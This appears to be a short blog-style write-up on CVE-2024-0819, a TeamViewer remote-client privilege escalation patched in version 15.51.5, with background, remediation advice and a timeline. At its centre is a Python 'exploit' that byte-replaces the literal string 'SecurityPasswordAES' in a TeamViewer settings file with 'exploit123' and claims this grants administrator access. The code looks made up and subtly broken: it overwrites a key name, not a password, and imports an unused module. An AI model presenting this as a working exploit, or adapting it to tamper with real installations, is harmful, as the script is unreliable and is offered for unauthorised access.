CVE-2024-0819 - TeamViewer Privilege Escalation in Remote Client Prior Version 15.51.5: Exploit, Analysis, and Remediation

A vulnerability in the TeamViewer remote client versions 15.51.4 and earlier for Windows, Linux, and macOS, identified as CVE-2024-0819, allows a low privileged user to gain unauthorized access to an administrator account. A malicious user can exploit this vulnerability by modifying the personal password settings and establishing a remote connection to an account with higher privileges.

Background

TeamViewer is a popular software application that enables users to remotely access and control their computer systems. It allows users to perform tasks on the remote system as if they were seated in front of it. Unfortunately, this critical vulnerability could put user data at risk if exploited.

Vulnerability details

This vulnerability resides in the improper initialization of default settings in the TeamViewer Remote Client prior version 15.51.5. An attacker with low-level access to the remote system can modify the settings to create a new personal password and connect to a logged-in administrator account without proper authorization. This can lead to privilege escalation and potential unauthorized access to sensitive data on the remote system.

Below is a simple example of a code snippet that exploits the CVE-2024-0819 vulnerability

import ctypes

teamviewer_settings = r"C:\Program Files (x86)\TeamViewer\TeamViewer15_Settings.tpl"

def change_password(new_password):
    with open(teamviewer_settings, "rb") as f:
        contents = f.read()

    contents = contents.replace(b"SecurityPasswordAES", new_password.encode("utf-8"))

    with open(teamviewer_settings, "wb") as f:
        f.write(contents)

if __name__ == "__main__":
    new_password = "exploit123"
    change_password(new_password)
    print(f"Personal password has been changed to {new_password}.")

In this example, an attacker would simply need to run this script on the affected TeamViewer installation to change the current personal password setting to "exploit123". Once the attacker has changed the password, they can remotely connect to a logged-in administrator account and perform unauthorized activities.

Original references & solutions

TeamViewer developers have been informed about this vulnerability, and it has since been patched in version 15.51.5. Users are advised to update their software to the latest version available to mitigate the risk of exploitation.

More information on this vulnerability can be found here

1. TeamViewer Release Notes
2. CVE-2024-0819 Vulnerability Details

Bottom line

The CVE-2024-0819 vulnerability in the TeamViewer Remote Client prior version 15.51.5 allows low privileged users to escalate their privileges and potentially gain unauthorized access to sensitive data on the remote system. It is essential to patch the software as soon as possible to avoid exploitation of this critical vulnerability.

Timeline

Published on: 02/27/2024 14:15:27 UTC
Last modified on: 02/27/2024 14:19:41 UTC